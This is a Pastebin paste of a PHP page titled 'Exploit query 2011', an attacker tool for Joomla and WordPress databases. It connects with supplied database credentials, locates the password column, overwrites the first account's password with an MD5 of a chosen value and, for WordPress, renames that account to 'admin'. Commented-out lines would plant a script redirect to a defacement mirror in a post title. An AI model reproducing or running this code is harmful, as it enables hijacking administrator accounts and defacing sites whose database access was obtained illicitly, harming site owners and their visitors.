Advertisement
Guest User

@query.php

a guest
Dec 22nd, 2013
356
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.75 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
  2.     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
  3.  
  4. <html xmlns="http://www.w3.org/1999/xhtml">
  5.  
  6. <head>
  7.   <title>Exploit query 2011 #</title>
  8. </head>
  9. <style type="text/css">
  10. body{
  11.   background: #333333;
  12.   color: #fff;
  13.   font-family: Consolas;
  14.   font-size: 13px;
  15.  
  16. }
  17. .text {
  18.   background: #fff;
  19.   color: #000;
  20. }
  21. .text:hover {
  22.   background: #FFFFCC;
  23. }
  24.  
  25. .submit {
  26.   background: #333330;
  27.   padding: 2px;
  28.   margin: 0px;
  29.   color: #fff;
  30.   border: thick;
  31. }
  32. .submit:hover {
  33.   background: #555;
  34. }
  35.  
  36. </style>
  37. <body>
  38. <center><h2># Mysql Query #</h2>
  39. <form action="" method="post">
  40. host : <input type="text" value="localhost" name="localhost" class="text" />&nbsp;&nbsp;
  41. db&nbsp;&nbsp;:&nbsp; <input type="text" name="db" class="text" /><br />
  42. user : <input type="text" name="userdb" class="text" /> &nbsp; pass : <input type="text" name="passdb" class="text" /><br />  <br />What password ! : <input type="text" name="mdpass"  class="text" /><br />
  43. joomla : <input type="radio" value="1"  name="ch1" /> wordpress: <input type="radio" value="2" name="ch1" /> <br />   <br />
  44.  
  45. <input type="submit" name ="go" value="#- Done -#" class="submit" />
  46.  
  47.  
  48. </form>
  49.  
  50. </center>
  51. <?
  52.  
  53. $host = $_POST['locch1alhost'];
  54. $dbname = $_POST['db'];
  55. $dbuser = $_POST['userdb'];
  56. $dbpass = $_POST['passdb'];
  57. $kolk = md5($_POST['mdpass']);
  58. if ($_POST['ch1'] == 1) {
  59.  
  60.  
  61.     $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
  62.     $selectdb = mysql_select_db($dbname,$connect);
  63.  
  64.     $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_schema) from information_schema.columns where column_name LIKE "%pas%"');
  65.     $show = mysql_fetch_array($cyber);
  66.     $defg = $show[0];
  67.     $imp = explode(':',$defg);
  68.     $ar = $imp[0];
  69.  
  70.     $conar = mysql_query("SELECT * FROM $ar");
  71.     $showar = mysql_fetch_array($conar);
  72.  
  73.     ################# set
  74.    $setar = mysql_query("UPDATE $ar SET password='".$kolk."' WHERE id = '".$showar[0]."' ");
  75.     echo $setar;
  76.     echo "user name is -> $showar[2]";
  77. } else if ($_POST['ch1'] == '2') {
  78.  
  79.     $connect = mysql_connect($host,$dbuser,$dbpass) or die ("Soory Not Login the database");
  80.     $selectdb = mysql_select_db($dbname,$connect);
  81.  
  82.     $cyber = mysql_query('select concat(table_name,0x3a,column_name,0x3a,table_schema) from information_schema.columns where column_name LIKE "%user_pass%"');
  83.     $show = mysql_fetch_array($cyber);
  84.     $defg = $show[0];
  85.     $imp = explode(':',$defg);
  86.     $ar = $imp[0];
  87.  
  88.     $conar = mysql_query("SELECT * FROM $ar");
  89.     $showar = mysql_fetch_array($conar);
  90.  
  91.     ################# set
  92.    $setar = mysql_query("UPDATE $ar SET user_pass='".$kolk."' WHERE id = '".$showar[0]."' ");
  93.     $setar .= mysql_query("UPDATE $ar SET user_login='admin' WHERE id = '".$showar[0]."' ");
  94.     echo $setar;
  95.     echo "user name is -> $showar[1]"."<br />";
  96.     #$qurl = mysql_query("select guid from wp_posts");
  97.    #$scr = "<script>document.location='http://zonehmirrors.net/defaced/2011/10/07/ecocolourchembd.com'</script>";
  98.    #$indq = mysql_query('UPDATE wp_posts SET post_title="'.$scr.'" WHERE id =1');
  99.        #$indexar = mysql_fetch_array($indq);
  100.    #$qin = mysql_query("select post_title from wp_posts where id =1");
  101.    #$rqin = mysql_fetch_array($qin);
  102.   # echo  htmlspecialchars("$rqin[0]");
  103.         $q = mysql_query("select * from wp_options where option_id='1' or option_name='home'");
  104.         while($wos = mysql_fetch_object($q)){
  105.             if ($wos){
  106.         echo "URL : ~>  ".$wos->option_value."<br>";
  107.         }}
  108.         }
  109. ?>
  110. </body>
  111. <br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br /><br />
  112. <center><b>Meked By Cyber-Crystal </b></center>
  113. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement